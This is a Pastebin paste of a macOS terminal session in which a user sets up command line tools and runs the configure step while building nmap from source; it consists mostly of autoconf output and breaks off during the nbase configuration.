Advertisement
Guest User

Untitled

a guest
Nov 27th, 2017
1,258
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 199.23 KB | None | 0 0
  1. Installing Command Line Tools in Mac OS X
  2.     1Launch the Terminal, found in /Applications/Utilities/
  3.     2Type the following command string:
  4.     3xcode-select --install

  5.  
  6.  
  7. SixMillionKilaTons:Library osx$ nmap
  8. -bash: nmap: command not found
  9. SixMillionKilaTons:Library osx$ man nmap
  10. No manual entry for nmap
  11. SixMillionKilaTons:Library osx$ ls
  12. Application Support Image Capture       QuickLook
  13. Audio           Input Methods       QuickTime
  14. Caches          Internet Plug-Ins   Receipts
  15. ColorPickers        Java            Ruby
  16. ColorSync       Keyboard Layouts    Sandbox
  17. Components      Keychains       Screen Savers
  18. Compositions        LaunchAgents        ScriptingAdditions
  19. Contextual Menu Items   LaunchDaemons       Scripts
  20. CoreAnalytics       Logs            Security
  21. CoreMediaIO     MessageTracer       Speech
  22. Desktop Pictures    Messages        Spotlight
  23. Developer       Modem Scripts       StagedExtensions
  24. DirectoryServices   OpenDirectory       StartupItems
  25. Documentation       PDF Services        SystemMigration
  26. Extensions      Perl            SystemProfiler
  27. Filesystems     PreferencePanes     Updates
  28. Fonts           Preferences     User Pictures
  29. Frameworks      Printers        Video
  30. GPUBundles      PrivilegedHelperTools   WebServer
  31. Graphics        Python          Widgets
  32. SixMillionKilaTons:Library osx$ cd /
  33. SixMillionKilaTons:/ osx$ ls
  34. Applications            etc
  35. Library             home
  36. Network             installer.failurerequests
  37. System              net
  38. Users               private
  39. Volumes             sbin
  40. bin             tmp
  41. cores               usr
  42. default.profraw         var
  43. dev             vm
  44. SixMillionKilaTons:/ osx$ cd Users
  45. SixMillionKilaTons:Users osx$ ls
  46. Shared  osx
  47. SixMillionKilaTons:Users osx$ cd osx
  48. SixMillionKilaTons:~ osx$ ls
  49. Desktop         Movies          config.log
  50. Documents       Music           eclipse-workspace
  51. Downloads       Pictures        iCloud Drive (Archive)
  52. Library         Public          nano.save
  53. SixMillionKilaTons:~ osx$ cd Documents
  54. SixMillionKilaTons:Documents osx$ ls
  55. Developing      gargoyle.gif        scorpionmk.jpg
  56. Song Wish List.rtf  nmap
  57. SixMillionKilaTons:Documents osx$ cd nmap
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68. SixMillionKilaTons:nmap osx$ ./configure
  69. checking whether NLS is requested... yes
  70. checking build system type... x86_64-apple-darwin17.2.0
  71. checking host system type... x86_64-apple-darwin17.2.0
  72. checking for gcc... gcc
  73. checking whether the C compiler works... no
  74. configure: error: in `/Users/osx/Documents/nmap':
  75. configure: error: C compiler cannot create executables
  76. See `config.log' for more details
  77. SixMillionKilaTons:nmap osx$ sudo ./configure
  78. Password:
  79. Sorry, try again.
  80. Password:
  81. checking whether NLS is requested... yes
  82. checking build system type... x86_64-apple-darwin17.2.0
  83. checking host system type... x86_64-apple-darwin17.2.0
  84. checking for gcc... gcc
  85. checking whether the C compiler works... no
  86. configure: error: in `/Users/osx/Documents/nmap':
  87. configure: error: C compiler cannot create executables
  88. See `config.log' for more details
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95. SixMillionKilaTons:nmap osx$ make
  96. xcrun: error: invalid active developer path (/Library/Developer/CommandLineTools), missing xcrun at: /Library/Developer/CommandLineTools/usr/bin/xcrun
  97.  
  98.  
  99.  
  100.  
  101. SixMillionKilaTons:nmap osx$ sh gtko-osx-build-setup.sh
  102. sh: gtko-osx-build-setup.sh: No such file or directory
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110.  
  111. SixMillionKilaTons:nmap osx$ ./configure
  112. checking whether NLS is requested... yes
  113. checking build system type... x86_64-apple-darwin17.2.0
  114. checking host system type... x86_64-apple-darwin17.2.0
  115. checking for gcc... gcc
  116. checking whether the C compiler works... yes
  117. checking for C compiler default output file name... a.out
  118. checking for suffix of executables...
  119. checking whether we are cross compiling... no
  120. checking for suffix of object files... o
  121. checking whether we are using the GNU C compiler... yes
  122. checking whether gcc accepts -g... yes
  123. checking for gcc option to accept ISO C89... none needed
  124. checking for inline... inline
  125. checking for gcc... (cached) gcc
  126. checking whether we are using the GNU C compiler... (cached) yes
  127. checking whether gcc accepts -g... (cached) yes
  128. checking for gcc option to accept ISO C89... (cached) none needed
  129. checking for g++... g++
  130. checking whether we are using the GNU C++ compiler... yes
  131. checking whether g++ accepts -g... yes
  132. checking for ranlib... ranlib
  133. checking for a BSD-compatible install... /usr/bin/install -c
  134. checking for gawk... no
  135. checking for mawk... no
  136. checking for nawk... no
  137. checking for awk... awk
  138. checking for __func__... yes
  139. checking for strip... /usr/bin/strip
  140. checking for main in -lm... yes
  141. checking how to run the C preprocessor... gcc -E
  142. checking for grep that handles long lines and -e... /usr/bin/grep
  143. checking for egrep... /usr/bin/grep -E
  144. checking for ANSI C header files... yes
  145. checking for sys/types.h... yes
  146. checking for sys/stat.h... yes
  147. checking for stdlib.h... yes
  148. checking for string.h... yes
  149. checking for memory.h... yes
  150. checking for strings.h... yes
  151. checking for inttypes.h... yes
  152. checking for stdint.h... yes
  153. checking for unistd.h... yes
  154. checking pwd.h usability... yes
  155. checking pwd.h presence... yes
  156. checking for pwd.h... yes
  157. checking termios.h usability... yes
  158. checking termios.h presence... yes
  159. checking for termios.h... yes
  160. checking sys/sockio.h usability... yes
  161. checking sys/sockio.h presence... yes
  162. checking for sys/sockio.h... yes
  163. checking for stdint.h... (cached) yes
  164. checking for linux/rtnetlink.h... no
  165. checking sys/socket.h usability... yes
  166. checking sys/socket.h presence... yes
  167. checking for sys/socket.h... yes
  168. checking for net/if.h... yes
  169. checking for library containing setsockopt... none required
  170. checking for library containing gethostbyname... none required
  171. checking if AF_INET6 IPPROTO_RAW sockets include the packet header... no
  172. checking for a Python interpreter with version >= 2.4... python2.7
  173. checking for python2.7... /usr/bin/python2.7
  174. checking for python2.7 version... 2.7
  175. checking for python2.7 platform... darwin
  176. checking for python2.7 script directory... ${prefix}/lib/python2.7/site-packages
  177. checking for python2.7 extension module directory... ${exec_prefix}/lib/python2.7/site-packages
  178. checking openssl/ssl.h usability... no
  179. checking openssl/ssl.h presence... no
  180. checking for openssl/ssl.h... no
  181. configure: WARNING: Failed to find openssl/ssl.h so OpenSSL will not be used. If it is installed you can try the --with-openssl=DIR argument
  182. checking pcap.h usability... yes
  183. checking pcap.h presence... yes
  184. checking for pcap.h... yes
  185. checking for pcap_datalink in -lpcap... yes
  186. checking sys/ioccom.h usability... yes
  187. checking sys/ioccom.h presence... yes
  188. checking for sys/ioccom.h... yes
  189. checking sys/time.h usability... yes
  190. checking sys/time.h presence... yes
  191. checking for sys/time.h... yes
  192. checking net/bpf.h usability... yes
  193. checking net/bpf.h presence... yes
  194. checking for net/bpf.h... yes
  195. checking if libpcap is suitable... no
  196. checking pcre.h usability... no
  197. checking pcre.h presence... no
  198. checking for pcre.h... no
  199. checking pcre/pcre.h usability... no
  200. checking pcre/pcre.h presence... no
  201. checking for pcre/pcre.h... no
  202. checking zlib.h usability... yes
  203. checking zlib.h presence... yes
  204. checking for zlib.h... yes
  205. checking for gzread in -lz... yes
  206. checking for library containing dlopen... none required
  207. checking lua5.3/lua.h usability... no
  208. checking lua5.3/lua.h presence... no
  209. checking for lua5.3/lua.h... no
  210. checking lua/5.3/lua.h usability... no
  211. checking lua/5.3/lua.h presence... no
  212. checking for lua/5.3/lua.h... no
  213. checking lua.h usability... no
  214. checking lua.h presence... no
  215. checking for lua.h... no
  216. checking lua/lua.h usability... no
  217. checking lua/lua.h presence... no
  218. checking for lua/lua.h... no
  219. checking for lua version == 503... no
  220. checking linear.h usability... no
  221. checking linear.h presence... no
  222. checking for linear.h... no
  223. no
  224. checking whether byte ordering is bigendian... no
  225. checking if struct in_addr is a wacky huge structure (some Sun boxes)... no
  226. checking if struct icmp exists... yes
  227. checking if struct ip exists... yes
  228. checking if struct ip has ip_sum member... yes
  229. checking for strerror... yes
  230. checking for type of 6th argument to recvfrom()... socklen_t
  231. checking for APR... no
  232. configure: creating ./config.status
  233. config.status: creating Makefile
  234. config.status: creating libnetutil/Makefile
  235. config.status: creating nmap_config.h
  236. === configuring in nping (/Users/osx/Documents/nmap/nping)
  237. configure: running /bin/sh ./configure --disable-option-checking '--prefix=/usr/local'  --cache-file=/dev/null --srcdir=.
  238. checking build system type... x86_64-apple-darwin17.2.0
  239. checking host system type... x86_64-apple-darwin17.2.0
  240. checking for gcc... gcc
  241. checking whether the C compiler works... yes
  242. checking for C compiler default output file name... a.out
  243. checking for suffix of executables...
  244. checking whether we are cross compiling... no
  245. checking for suffix of object files... o
  246. checking whether we are using the GNU C compiler... yes
  247. checking whether gcc accepts -g... yes
  248. checking for gcc option to accept ISO C89... none needed
  249. checking for inline... inline
  250. checking for gcc... (cached) gcc
  251. checking whether we are using the GNU C compiler... (cached) yes
  252. checking whether gcc accepts -g... (cached) yes
  253. checking for gcc option to accept ISO C89... (cached) none needed
  254. checking for g++... g++
  255. checking whether we are using the GNU C++ compiler... yes
  256. checking whether g++ accepts -g... yes
  257. checking for a BSD-compatible install... /usr/bin/install -c
  258. checking whether the compiler is gcc 4 or greater... Configured with: --prefix=/Library/Developer/CommandLineTools/usr --with-gxx-include-dir=/usr/include/c++/4.2.1
  259. yes
  260. checking for __func__... yes
  261. checking for strip... /usr/bin/strip
  262. checking how to run the C preprocessor... gcc -E
  263. checking for grep that handles long lines and -e... /usr/bin/grep
  264. checking for egrep... /usr/bin/grep -E
  265. checking for ANSI C header files... yes
  266. checking for sys/types.h... yes
  267. checking for sys/stat.h... yes
  268. checking for stdlib.h... yes
  269. checking for string.h... yes
  270. checking for memory.h... yes
  271. checking for strings.h... yes
  272. checking for inttypes.h... yes
  273. checking for stdint.h... yes
  274. checking for unistd.h... yes
  275. checking pwd.h usability... yes
  276. checking pwd.h presence... yes
  277. checking for pwd.h... yes
  278. checking termios.h usability... yes
  279. checking termios.h presence... yes
  280. checking for termios.h... yes
  281. checking sys/sockio.h usability... yes
  282. checking sys/sockio.h presence... yes
  283. checking for sys/sockio.h... yes
  284. checking for library containing setsockopt... none required
  285. checking for library containing gethostbyname... none required
  286. checking for library containing dlopen... none required
  287. checking for library containing nl_handle_alloc... no
  288. checking openssl/ssl.h usability... no
  289. checking openssl/ssl.h presence... no
  290. checking for openssl/ssl.h... no
  291. configure: WARNING: Failed to find openssl/ssl.h so OpenSSL will not be used. If it is installed you can try the --with-openssl=DIR argument
  292. checking pcap.h usability... yes
  293. checking pcap.h presence... yes
  294. checking for pcap.h... yes
  295. checking for pcap_datalink in -lpcap... yes
  296. checking sys/ioccom.h usability... yes
  297. checking sys/ioccom.h presence... yes
  298. checking for sys/ioccom.h... yes
  299. checking sys/time.h usability... yes
  300. checking sys/time.h presence... yes
  301. checking for sys/time.h... yes
  302. checking net/bpf.h usability... yes
  303. checking net/bpf.h presence... yes
  304. checking for net/bpf.h... yes
  305. checking if libpcap is suitable... no
  306. checking if sockaddr{} has sa_len member... yes
  307. checking if sockaddr_in{} has sin_len member... yes
  308. checking if sockaddr_in6{} has sin6_len member... yes
  309. checking whether byte ordering is bigendian... no
  310. checking if struct in_addr is a wacky huge structure (some Sun boxes)... no
  311. checking if struct ip has ip_sum member... yes
  312. checking if function signal is accessible... no
  313. checking for main in -lm... yes
  314. checking for strerror... yes
  315. configure: creating ./config.status
  316. config.status: creating Makefile
  317. config.status: creating nping_config.h
  318.                         o        
  319.                          o        
  320.                           o      
  321.                    o       o      
  322.                     o       o    
  323.                      o       o    
  324.                o      o       o  
  325.                 o      o      o  
  326.     888b    888  o     o      o  
  327.     8888b   888  o     o      o  
  328.     88888b  888  o     o      o  
  329.     888Y88b 888               o  
  330.     888 Y88b888               o  
  331.     888  Y88888                  
  332.     888   Y8888                  
  333.     888    Y888                  
  334.                                  
  335.     --[NPING]--                  
  336. Configuration complete.  Type make (or gmake on some *BSD machines) to compile.
  337. === configuring in libpcap (/Users/osx/Documents/nmap/libpcap)
  338. configure: running /bin/sh ./configure --disable-option-checking '--prefix=/usr/local'  --cache-file=/dev/null --srcdir=.
  339. checking build system type... x86_64-apple-darwin17.2.0
  340. checking host system type... x86_64-apple-darwin17.2.0
  341. checking target system type... x86_64-apple-darwin17.2.0
  342. checking for gcc... gcc
  343. checking whether the C compiler works... yes
  344. checking for C compiler default output file name... a.out
  345. checking for suffix of executables...
  346. checking whether we are cross compiling... no
  347. checking for suffix of object files... o
  348. checking whether we are using the GNU C compiler... yes
  349. checking whether gcc accepts -g... yes
  350. checking for gcc option to accept ISO C89... none needed
  351. checking for inline... inline
  352. checking for __attribute__... yes
  353. checking whether __attribute__((unused)) can be used without warnings... yes
  354. checking whether __attribute__((format)) can be used without warnings... yes
  355. checking how to run the C preprocessor... gcc -E
  356. checking for grep that handles long lines and -e... /usr/bin/grep
  357. checking for egrep... /usr/bin/grep -E
  358. checking for ANSI C header files... yes
  359. checking for sys/types.h... yes
  360. checking for sys/stat.h... yes
  361. checking for stdlib.h... yes
  362. checking for string.h... yes
  363. checking for memory.h... yes
  364. checking for strings.h... yes
  365. checking for inttypes.h... yes
  366. checking for stdint.h... yes
  367. checking for unistd.h... yes
  368. checking sys/bitypes.h usability... no
  369. checking sys/bitypes.h presence... no
  370. checking for sys/bitypes.h... no
  371. checking for int8_t... yes
  372. checking for u_int8_t... yes
  373. checking for int16_t... yes
  374. checking for u_int16_t... yes
  375. checking for int32_t... yes
  376. checking for u_int32_t... yes
  377. checking for int64_t... yes
  378. checking for u_int64_t... yes
  379. checking for special C compiler options needed for large files... no
  380. checking for _FILE_OFFSET_BITS value needed for large files... no
  381. checking for _LARGEFILE_SOURCE value needed for large files... no
  382. checking sys/ioccom.h usability... yes
  383. checking sys/ioccom.h presence... yes
  384. checking for sys/ioccom.h... yes
  385. checking sys/sockio.h usability... yes
  386. checking sys/sockio.h presence... yes
  387. checking for sys/sockio.h... yes
  388. checking limits.h usability... yes
  389. checking limits.h presence... yes
  390. checking for limits.h... yes
  391. checking paths.h usability... yes
  392. checking paths.h presence... yes
  393. checking for paths.h... yes
  394. checking linux/types.h usability... no
  395. checking linux/types.h presence... no
  396. checking for linux/types.h... no
  397. checking linux/if_packet.h usability... no
  398. checking linux/if_packet.h presence... no
  399. checking for linux/if_packet.h... no
  400. checking netpacket/packet.h usability... no
  401. checking netpacket/packet.h presence... no
  402. checking for netpacket/packet.h... no
  403. checking netpacket/if_packet.h usability... no
  404. checking netpacket/if_packet.h presence... no
  405. checking for netpacket/if_packet.h... no
  406. checking for net/pfvar.h... no
  407. checking for netinet/if_ether.h... yes
  408. checking for ANSI ioctl definitions... yes
  409. checking for strerror... yes
  410. checking for strlcpy... yes
  411. checking for vsnprintf... yes
  412. checking for snprintf... yes
  413. checking for library containing gethostbyname... none required
  414. checking for library containing socket... none required
  415. checking for library containing putmsg... no
  416. checking for ether_hostton... yes
  417. checking whether ether_hostton is declared... yes
  418. checking if --disable-protochain option is specified... enabled
  419. checking packet capture type... bpf
  420. checking net/if_media.h usability... yes
  421. checking net/if_media.h presence... yes
  422. checking for net/if_media.h... yes
  423. checking whether the system supports zerocopy BPF... no
  424. checking for struct BPF_TIMEVAL... yes
  425. checking for getifaddrs... yes
  426. checking ifaddrs.h usability... yes
  427. checking ifaddrs.h presence... yes
  428. checking for ifaddrs.h... yes
  429. checking for socklen_t... yes
  430. checking for getaddrinfo... yes
  431. checking whether to build optimizer debugging code... no
  432. checking whether to build parser debugging code... no
  433. checking whether we have DAG API headers... no (/usr/local/include)
  434. checking whether we have the DAG API... no
  435. checking whether we have Septel API... no
  436. checking whether we have Myricom Sniffer API... no (/opt/snf)
  437. checking for ranlib... ranlib
  438. checking for ar... ar
  439. checking whether ln -s works... yes
  440. checking if sockaddr struct has the sa_len member... yes
  441. checking if sockaddr_storage struct exists... yes
  442. checking if dl_hp_ppa_info_t struct has dl_module_id_1 member... no
  443. checking if unaligned accesses fail... no
  444. checking for USB sniffing support... no
  445. checking whether the platform could support netfilter sniffing... no
  446. configure: no hardware timestamp support implemented for darwin17.2.0
  447. checking for a BSD-compatible install... /usr/bin/install -c
  448. configure: creating ./config.status
  449. config.status: creating Makefile
  450. config.status: creating pcap-filter.manmisc
  451. config.status: creating pcap-linktype.manmisc
  452. config.status: creating pcap-tstamp.manmisc
  453. config.status: creating pcap-savefile.manfile
  454. config.status: creating pcap.3pcap
  455. config.status: creating pcap_compile.3pcap
  456. config.status: creating pcap_datalink.3pcap
  457. config.status: creating pcap_dump_open.3pcap
  458. config.status: creating pcap_get_tstamp_precision.3pcap
  459. config.status: creating pcap_list_datalinks.3pcap
  460. config.status: creating pcap_list_tstamp_types.3pcap
  461. config.status: creating pcap_open_dead.3pcap
  462. config.status: creating pcap_open_offline.3pcap
  463. config.status: creating pcap_set_tstamp_precision.3pcap
  464. config.status: creating pcap_set_tstamp_type.3pcap
  465. config.status: creating config.h
  466. config.status: executing default-1 commands
  467. === configuring in libpcre (/Users/osx/Documents/nmap/libpcre)
  468. configure: running /bin/sh ./configure --disable-option-checking '--prefix=/usr/local'  --cache-file=/dev/null --srcdir=.
  469. checking for a BSD-compatible install... /usr/bin/install -c
  470. checking whether build environment is sane... yes
  471. checking for a thread-safe mkdir -p... ./../shtool install -c -d
  472. checking for gawk... no
  473. checking for mawk... no
  474. checking for nawk... no
  475. checking for awk... awk
  476. checking whether make sets $(MAKE)... yes
  477. checking for gcc... gcc
  478. checking whether the C compiler works... yes
  479. checking for C compiler default output file name... a.out
  480. checking for suffix of executables...
  481. checking whether we are cross compiling... no
  482. checking for suffix of object files... o
  483. checking whether we are using the GNU C compiler... yes
  484. checking whether gcc accepts -g... yes
  485. checking for gcc option to accept ISO C89... none needed
  486. checking for style of include used by make... GNU
  487. checking dependency style of gcc... gcc3
  488. checking for ranlib... ranlib
  489. checking whether ln -s works... yes
  490. checking how to run the C preprocessor... gcc -E
  491. checking for grep that handles long lines and -e... /usr/bin/grep
  492. checking for egrep... /usr/bin/grep -E
  493. checking for ANSI C header files... yes
  494. checking for sys/types.h... yes
  495. checking for sys/stat.h... yes
  496. checking for stdlib.h... yes
  497. checking for string.h... yes
  498. checking for memory.h... yes
  499. checking for strings.h... yes
  500. checking for inttypes.h... yes
  501. checking for stdint.h... yes
  502. checking for unistd.h... yes
  503. checking limits.h usability... yes
  504. checking limits.h presence... yes
  505. checking for limits.h... yes
  506. checking for sys/types.h... (cached) yes
  507. checking for sys/stat.h... (cached) yes
  508. checking dirent.h usability... yes
  509. checking dirent.h presence... yes
  510. checking for dirent.h... yes
  511. checking windows.h usability... no
  512. checking windows.h presence... no
  513. checking for windows.h... no
  514. checking for an ANSI C-conforming const... yes
  515. checking for size_t... yes
  516. checking for long long... yes
  517. checking for unsigned long long... yes
  518. checking for bcopy... yes
  519. checking for memmove... yes
  520. checking for strerror... yes
  521. checking for strtoq... yes
  522. checking for strtoll... yes
  523. checking for _strtoi64... no
  524. checking zlib.h usability... yes
  525. checking zlib.h presence... yes
  526. checking for zlib.h... yes
  527. checking for gzopen in -lz... yes
  528. checking bzlib.h usability... yes
  529. checking bzlib.h presence... yes
  530. checking for bzlib.h... yes
  531. checking for BZ2_bzopen in -lbz2... yes
  532. checking readline/readline.h usability... yes
  533. checking readline/readline.h presence... yes
  534. checking for readline/readline.h... yes
  535. checking readline/history.h usability... yes
  536. checking readline/history.h presence... yes
  537. checking for readline/history.h... yes
  538. checking for readline in -lreadline... yes
  539. checking build system type... x86_64-apple-darwin17.2.0
  540. checking host system type... x86_64-apple-darwin17.2.0
  541. configure: creating ./config.status
  542. config.status: creating Makefile
  543. config.status: creating pcre-config
  544. config.status: creating config.h
  545. config.status: executing depfiles commands
  546. config.status: executing script-chmod commands
  547. === configuring in libdnet-stripped (/Users/osx/Documents/nmap/libdnet-stripped)
  548. configure: running /bin/sh ./configure --disable-option-checking '--prefix=/usr/local'  --cache-file=/dev/null --srcdir=.
  549. checking for a BSD-compatible install... /usr/bin/install -c
  550. checking whether build environment is sane... yes
  551. checking for a thread-safe mkdir -p... ./../shtool -c -d
  552. checking for gawk... no
  553. checking for mawk... no
  554. checking for nawk... no
  555. checking for awk... awk
  556. checking whether make sets $(MAKE)... yes
  557. checking whether to enable maintainer-specific portions of Makefiles... no
  558. checking build system type... x86_64-apple-darwin17.2.0
  559. checking host system type... x86_64-apple-darwin17.2.0
  560. checking for gcc... gcc
  561. checking for C compiler default output file name... a.out
  562. checking whether the C compiler works... yes
  563. checking whether we are cross compiling... no
  564. checking for suffix of executables...
  565. checking for suffix of object files... o
  566. checking whether we are using the GNU C compiler... yes
  567. checking whether gcc accepts -g... yes
  568. checking for gcc option to accept ISO C89... none needed
  569. checking for style of include used by make... GNU
  570. checking dependency style of gcc... gcc3
  571. checking for a sed that does not truncate output... /usr/bin/sed
  572. checking for grep that handles long lines and -e... /usr/bin/grep
  573. checking for egrep... /usr/bin/grep -E
  574. checking for fgrep... /usr/bin/grep -F
  575. checking for ld used by gcc... /Library/Developer/CommandLineTools/usr/bin/ld
  576. checking if the linker (/Library/Developer/CommandLineTools/usr/bin/ld) is GNU ld... no
  577. checking for BSD- or MS-compatible name lister (nm)... /usr/bin/nm -B
  578. checking the name lister (/usr/bin/nm -B) interface... BSD nm
  579. checking whether ln -s works... yes
  580. checking the maximum length of command line arguments... 196608
  581. checking whether the shell understands some XSI constructs... yes
  582. checking whether the shell understands "+="... yes
  583. checking for /Library/Developer/CommandLineTools/usr/bin/ld option to reload object files... -r
  584. checking for objdump... objdump
  585. checking how to recognize dependent libraries... pass_all
  586. checking for ar... ar
  587. checking for strip... strip
  588. checking for ranlib... ranlib
  589. checking command to parse /usr/bin/nm -B output from gcc object... ok
  590. checking for dsymutil... dsymutil
  591. checking for nmedit... nmedit
  592. checking for lipo... lipo
  593. checking for otool... otool
  594. checking for otool64... no
  595. checking for -single_module linker flag... yes
  596. checking for -exported_symbols_list linker flag... yes
  597. checking how to run the C preprocessor... gcc -E
  598. checking for ANSI C header files... yes
  599. checking for sys/types.h... yes
  600. checking for sys/stat.h... yes
  601. checking for stdlib.h... yes
  602. checking for string.h... yes
  603. checking for memory.h... yes
  604. checking for strings.h... yes
  605. checking for inttypes.h... yes
  606. checking for stdint.h... yes
  607. checking for unistd.h... yes
  608. checking for dlfcn.h... yes
  609. checking for objdir... .libs
  610. checking if gcc supports -fno-rtti -fno-exceptions... yes
  611. checking for gcc option to produce PIC... -fno-common -DPIC
  612. checking if gcc PIC flag -fno-common -DPIC works... yes
  613. checking if gcc static flag -static works... no
  614. checking if gcc supports -c -o file.o... yes
  615. checking if gcc supports -c -o file.o... (cached) yes
  616. checking whether the gcc linker (/Library/Developer/CommandLineTools/usr/bin/ld) supports shared libraries... yes
  617. checking dynamic linker characteristics... darwin17.2.0 dyld
  618. checking how to hardcode library paths into programs... immediate
  619. checking for dlopen in -ldl... yes
  620. checking whether a program can dlopen itself... yes
  621. checking whether a statically linked program can dlopen itself... yes
  622. checking whether stripping libraries is possible... yes
  623. checking if libtool supports shared libraries... yes
  624. checking whether to build shared libraries... no
  625. checking whether to build static libraries... yes
  626. checking for Python... checking for gethostbyname... yes
  627. checking for socket... yes
  628. checking for putmsg in -lstr... no
  629. checking for open_mib in -lnm... no
  630. checking for Check... no
  631. checking for ANSI C header files... (cached) yes
  632. checking fcntl.h usability... yes
  633. checking fcntl.h presence... yes
  634. checking for fcntl.h... yes
  635. checking for unistd.h... (cached) yes
  636. checking sys/bufmod.h usability... no
  637. checking sys/bufmod.h presence... no
  638. checking for sys/bufmod.h... no
  639. checking sys/dlpi.h usability... no
  640. checking sys/dlpi.h presence... no
  641. checking for sys/dlpi.h... no
  642. checking sys/dlpihdr.h usability... no
  643. checking sys/dlpihdr.h presence... no
  644. checking for sys/dlpihdr.h... no
  645. checking sys/dlpi_ext.h usability... no
  646. checking sys/dlpi_ext.h presence... no
  647. checking for sys/dlpi_ext.h... no
  648. checking sys/ioctl.h usability... yes
  649. checking sys/ioctl.h presence... yes
  650. checking for sys/ioctl.h... yes
  651. checking sys/mib.h usability... no
  652. checking sys/mib.h presence... no
  653. checking for sys/mib.h... no
  654. checking sys/ndd_var.h usability... no
  655. checking sys/ndd_var.h presence... no
  656. checking for sys/ndd_var.h... no
  657. checking sys/socket.h usability... yes
  658. checking sys/socket.h presence... yes
  659. checking for sys/socket.h... yes
  660. checking sys/sockio.h usability... yes
  661. checking sys/sockio.h presence... yes
  662. checking for sys/sockio.h... yes
  663. checking sys/sysctl.h usability... yes
  664. checking sys/sysctl.h presence... yes
  665. checking for sys/sysctl.h... yes
  666. checking sys/time.h usability... yes
  667. checking sys/time.h presence... yes
  668. checking for sys/time.h... yes
  669. checking net/bpf.h usability... yes
  670. checking net/bpf.h presence... yes
  671. checking for net/bpf.h... yes
  672. checking net/if.h usability... yes
  673. checking net/if.h presence... yes
  674. checking for net/if.h... yes
  675. checking net/if_var.h usability... yes
  676. checking net/if_var.h presence... yes
  677. checking for net/if_var.h... yes
  678. checking net/if_arp.h usability... yes
  679. checking net/if_arp.h presence... yes
  680. checking for net/if_arp.h... yes
  681. checking net/if_dl.h usability... yes
  682. checking net/if_dl.h presence... yes
  683. checking for net/if_dl.h... yes
  684. checking net/pfilt.h usability... no
  685. checking net/pfilt.h presence... no
  686. checking for net/pfilt.h... no
  687. checking net/pfvar.h usability... no
  688. checking net/pfvar.h presence... no
  689. checking for net/pfvar.h... no
  690. checking net/radix.h usability... no
  691. checking net/radix.h presence... no
  692. checking for net/radix.h... no
  693. checking net/raw.h usability... no
  694. checking net/raw.h presence... no
  695. checking for net/raw.h... no
  696. checking net/route.h usability... yes
  697. checking net/route.h presence... yes
  698. checking for net/route.h... yes
  699. checking netinet/in_var.h usability... no
  700. checking netinet/in_var.h presence... yes
  701. configure: WARNING: netinet/in_var.h: present but cannot be compiled
  702. configure: WARNING: netinet/in_var.h:     check for missing prerequisite headers?
  703. configure: WARNING: netinet/in_var.h: see the Autoconf documentation
  704. configure: WARNING: netinet/in_var.h:     section "Present But Cannot Be Compiled"
  705. configure: WARNING: netinet/in_var.h: proceeding with the compiler's result
  706. checking for netinet/in_var.h... no
  707. checking netinet/in6_var.h usability... no
  708. checking netinet/in6_var.h presence... no
  709. checking for netinet/in6_var.h... no
  710. checking net/if_tun.h usability... no
  711. checking net/if_tun.h presence... no
  712. checking for net/if_tun.h... no
  713. checking linux/if_tun.h usability... no
  714. checking linux/if_tun.h presence... no
  715. checking for linux/if_tun.h... no
  716. checking netinet/ip_fw.h usability... no
  717. checking netinet/ip_fw.h presence... no
  718. checking for netinet/ip_fw.h... no
  719. checking linux/ip_fw.h usability... no
  720. checking linux/ip_fw.h presence... no
  721. checking for linux/ip_fw.h... no
  722. checking linux/ip_fwchains.h usability... no
  723. checking linux/ip_fwchains.h presence... no
  724. checking for linux/ip_fwchains.h... no
  725. checking linux/netfilter_ipv4/ipchains_core.h usability... no
  726. checking linux/netfilter_ipv4/ipchains_core.h presence... no
  727. checking for linux/netfilter_ipv4/ipchains_core.h... no
  728. checking ip_fil_compat.h usability... no
  729. checking ip_fil_compat.h presence... no
  730. checking for ip_fil_compat.h... no
  731. checking netinet/ip_fil_compat.h usability... no
  732. checking netinet/ip_fil_compat.h presence... no
  733. checking for netinet/ip_fil_compat.h... no
  734. checking ip_compat.h usability... no
  735. checking ip_compat.h presence... no
  736. checking for ip_compat.h... no
  737. checking netinet/ip_compat.h usability... no
  738. checking netinet/ip_compat.h presence... no
  739. checking for netinet/ip_compat.h... no
  740. checking ip_fil.h usability... no
  741. checking ip_fil.h presence... no
  742. checking for ip_fil.h... no
  743. checking netinet/ip_fil.h usability... no
  744. checking netinet/ip_fil.h presence... no
  745. checking for netinet/ip_fil.h... no
  746. checking hpsecurity.h usability... no
  747. checking hpsecurity.h presence... no
  748. checking for hpsecurity.h... no
  749. checking stropts.h usability... no
  750. checking stropts.h presence... no
  751. checking for stropts.h... no
  752. checking for an ANSI C-conforming const... yes
  753. checking for inline... inline
  754. checking for pid_t... yes
  755. checking for size_t... yes
  756. checking for sockaddr_in6 struct in <netinet/in.h>... yes
  757. checking for sa_len in sockaddr struct... yes
  758. checking for arp_dev in arpreq struct... no
  759. checking for rt_msghdr struct in <net/route.h>... yes
  760. checking whether gcc needs -traditional... no
  761. checking for socklen_t... yes
  762. checking for working memcmp... yes
  763. checking for err... yes
  764. checking for strlcat... yes
  765. checking for strlcpy... yes
  766. checking for strsep... yes
  767. checking for Berkeley Packet Filter... yes
  768. checking for Linux proc filesystem... no
  769. checking whether ETH_P_ALL is declared... no
  770. checking for Linux PF_PACKET sockets... no
  771. checking for SNMP MIB2 STREAMS... no
  772. checking for route(7) STREAMS... no
  773. checking for arp(7) ioctls... no
  774. checking for raw IP sockets ip_{len,off} host byte ordering... yes
  775. checking for cooked raw IP sockets... no
  776. checking for getkerninfo... no
  777. configure: creating ./config.status
  778. config.status: creating Makefile
  779. config.status: creating dnet-config
  780. config.status: creating include/Makefile
  781. config.status: creating include/dnet/Makefile
  782. config.status: creating src/Makefile
  783. config.status: creating include/config.h
  784. config.status: executing depfiles commands
  785. config.status: executing libtool commands
  786. config.status: executing default commands
  787. === configuring in nbase (/Users/osx/Documents/nmap/nbase)
  788. configure: running /bin/sh ./configure --disable-option-checking '--prefix=/usr/local'  --cache-file=/dev/null --srcdir=.
  789. checking for gcc... gcc
  790. checking whether the C compiler works... yes
  791. checking for C compiler default output file name... a.out
  792. checking for suffix of executables...
  793. checking whether we are cross compiling... no
  794. checking for suffix of object files... o
  795. checking whether we are using the GNU C compiler... yes
  796. checking whether gcc accepts -g... yes
  797. checking for gcc option to accept ISO C89... none needed
